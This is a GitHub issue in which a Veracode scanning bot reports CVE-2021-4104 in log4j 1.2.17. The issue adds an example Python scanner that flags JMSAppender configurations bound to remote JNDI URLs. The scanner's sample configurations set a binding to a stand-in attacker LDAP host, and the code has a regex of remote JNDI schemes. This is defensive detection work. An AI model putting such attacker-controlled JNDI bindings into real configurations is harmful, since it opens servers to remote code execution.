5l1D3R / Github-actions


CVE: 2021-4104 found in Apache Log4j - Version: 1.2.17 [JAVA] #9

Open github-actions[bot] opened 1 year ago

github-actions[bot] commented 1 year ago

Veracode Software Composition Analysis

| Attribute | Details |
| --- | --- |
| Library | Apache Log4j |
| Description | Apache Log4j 1.2 |
| Language | JAVA |
| Vulnerability | Deserialisation Of Untrusted Object |
| Vulnerability description | JMSAppender in log4j is vulnerable to deserialization of untrusted objects. When an application is configured to use JMSAppender with the setting TopicBindingName or TopicConnectionFactoryBindingName set to something that JNDI can handle, for example "ldap://host:port/a", an attacker is able to execute code on the server as in Log4j 2.x CVE-2021-44228. However, this vulnerability only depends on configuration. Note: This CVE is for Log4j 1.x; the corresponding flaw information for Log4j 2.x is in CVE-2021-44228. |
| CVE | 2021-4104 |
| CVSS score | 6 |
| Vulnerability present in version/s | 1.1.3-1.2.17 |
| Found library version/s | 1.2.17 |
| Vulnerability fixed in version | |
| Library latest version | 1.2.17 |
| Fix | log4j 1.x is End of Life. Its security vulnerabilities will not be fixed. Recommended to upgrade to the latest fix version of Log4j 2. |

Links:
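The finding above is configuration-dependent: CVE-2021-4104 is only reachable when the application's log4j 1.x configuration actually wires up `org.apache.log4j.net.JMSAppender`, whose `TopicBindingName` and `TopicConnectionFactoryBindingName` are resolved through JNDI. The scanner below is an added example, not code from this repository or from Veracode's tooling; it parses the two classic log4j 1.x configuration formats (log4j.properties and log4j.xml) and reports every JMSAppender, flagging binding names that look like remote JNDI references. The sample configurations, file labels and the list of JNDI URL schemes beyond `ldap://` are constructed assumptions for the demonstration.

```python
"""Check whether a log4j 1.x configuration meets the CVE-2021-4104 precondition.

Added example: scans log4j.properties / log4j.xml text for JMSAppender
definitions and flags TopicBindingName / TopicConnectionFactoryBindingName
values that are remote JNDI URLs (the CVE text's example is ldap://host:port/a).
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
BINDING_KEYS = ("TopicBindingName", "TopicConnectionFactoryBindingName")
# Assumed list of JNDI URL schemes that resolve to a remote object factory;
# ldap:// is the scheme named in the CVE description, the rest are assumptions.
REMOTE_JNDI = re.compile(r"^(ldap|ldaps|rmi|iiop|iiopname|corbaname|dns)://", re.I)
PROP_LINE = re.compile(r"^([^=:\s]+)\s*[=:]\s*(.*)$")   # key=value or key:value


@dataclass
class Finding:
    source: str                                   # label of the scanned config
    appender: str                                 # appender name in that config
    bindings: dict = field(default_factory=dict)  # binding key -> configured value
    remote: list = field(default_factory=list)    # binding keys holding a remote JNDI URL

    @property
    def status(self):
        # A remote JNDI binding is the CVE's exploitable case; any JMSAppender
        # still deserves review because its binding names are always looked up via JNDI.
        return "remote-jndi-binding" if self.remote else "jms-appender-present"


def _record(finding, key, value):
    finding.bindings[key] = value
    if REMOTE_JNDI.match(value):
        finding.remote.append(key)


def scan_properties(text, source="log4j.properties"):
    """Find JMSAppender definitions in a log4j.properties file."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":          # blank or comment line
            continue
        m = PROP_LINE.match(line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    findings = []
    for key, value in props.items():
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)   # log4j.appender.<name>
        if m and value == JMS_APPENDER:
            f = Finding(source, m.group(1))
            for bk in BINDING_KEYS:
                v = props.get(f"log4j.appender.{f.appender}.{bk}")
                if v is not None:
                    _record(f, bk, v)
            findings.append(f)
    return findings


def scan_xml(text, source="log4j.xml"):
    """Find JMSAppender definitions in a log4j.xml configuration."""
    findings = []
    for app in ET.fromstring(text).iter("appender"):
        if app.get("class") != JMS_APPENDER:
            continue
        f = Finding(source, app.get("name", "?"))
        for param in app.findall("param"):
            if param.get("name") in BINDING_KEYS:
                _record(f, param.get("name"), param.get("value", ""))
        findings.append(f)
    return findings


def audit(configs):
    """Scan a {label: (format, text)} mapping; returns one row per JMSAppender found."""
    rows = []
    for label, (fmt, text) in configs.items():
        scan = scan_properties if fmt == "properties" else scan_xml
        for f in scan(text, source=label):
            rows.append((f.source, f.appender, f.status, dict(f.bindings)))
    return rows


# Constructed sample configurations (not taken from the repository in this issue).
VULNERABLE_PROPERTIES = """\
# JMSAppender whose connection-factory binding is a remote LDAP JNDI name
log4j.rootLogger=INFO, stdout, JMS
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.JMS=org.apache.log4j.net.JMSAppender
log4j.appender.JMS.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory
log4j.appender.JMS.TopicConnectionFactoryBindingName=ldap://attacker.example:1389/a
log4j.appender.JMS.TopicBindingName=logTopic
"""

SAFE_PROPERTIES = """\
# Same application with the JMSAppender removed: CVE-2021-4104 no longer applies
log4j.rootLogger=INFO, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
"""

VULNERABLE_XML = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="jms" class="org.apache.log4j.net.JMSAppender">
    <param name="InitialContextFactoryName" value="org.apache.activemq.jndi.ActiveMQInitialContextFactory"/>
    <param name="TopicBindingName" value="ldap://attacker.example:1389/a"/>
    <param name="TopicConnectionFactoryBindingName" value="ConnectionFactory"/>
  </appender>
  <root><level value="info"/><appender-ref ref="jms"/></root>
</log4j:configuration>
"""

if __name__ == "__main__":
    for source, appender, status, bindings in audit({
        "vuln.properties": ("properties", VULNERABLE_PROPERTIES),
        "safe.properties": ("properties", SAFE_PROPERTIES),
        "vuln.xml": ("xml", VULNERABLE_XML),
    }):
        print(f"{source}: appender {appender!r} -> {status} {bindings}")
```

Run it against the real `log4j.properties` / `log4j.xml` shipped with the application (including any copies packaged inside JAR or WAR files) rather than the samples; a clean result only downgrades the urgency of this finding, it does not change the fact that log4j 1.2.17 is end of life and the Fix row's upgrade advice still stands.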

github-actions[bot] commented 1 year ago

Veracode issue link to PR: https://github.com/5l1D3R/Github-actions/pull/2